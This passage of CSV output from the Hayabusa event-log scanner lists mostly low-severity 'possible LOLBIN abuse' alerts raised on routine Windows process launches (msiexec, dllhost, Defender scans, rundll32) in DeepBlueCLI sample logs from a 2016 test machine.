0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:42:27.571 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:42:27.649 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:42:47.904 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:42:48.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:42:49.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:43:24.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:43:24.155 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:43:50.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:43:50.481 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:43:53.494 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:45:17.009 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:45:17.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:45:55.086 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:45:55.181 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:46:29.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:46:30.076 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:47:06.223 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:47:06.332 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:47:41.359 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:47:42.736 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:48:23.665 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:48:23.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:48:46.838 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:48:47.001 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:49:56.148 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:49:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:49:59.727 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:51:03.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:51:03.998 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:51:11.414 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:51:11.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:51:23.151 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:51:23.337 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:51:37.272 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:51:37.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:52:34.610 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:52:34.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:53:22.275 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:53:22.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-03 23:53:23.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 00:52:11.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:19:44.532 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:19:44.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:19:44.692 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:21:44.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:27:33.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:34:52.733 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:34:54.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-04 06:35:14.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-04 06:35:15.773 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:16.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:29.507 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:29.601 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:40.667 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:35:46.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:36:24.719 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:36:26.520 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:48:30.867 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 07:57:17.289 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 07:57:39.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 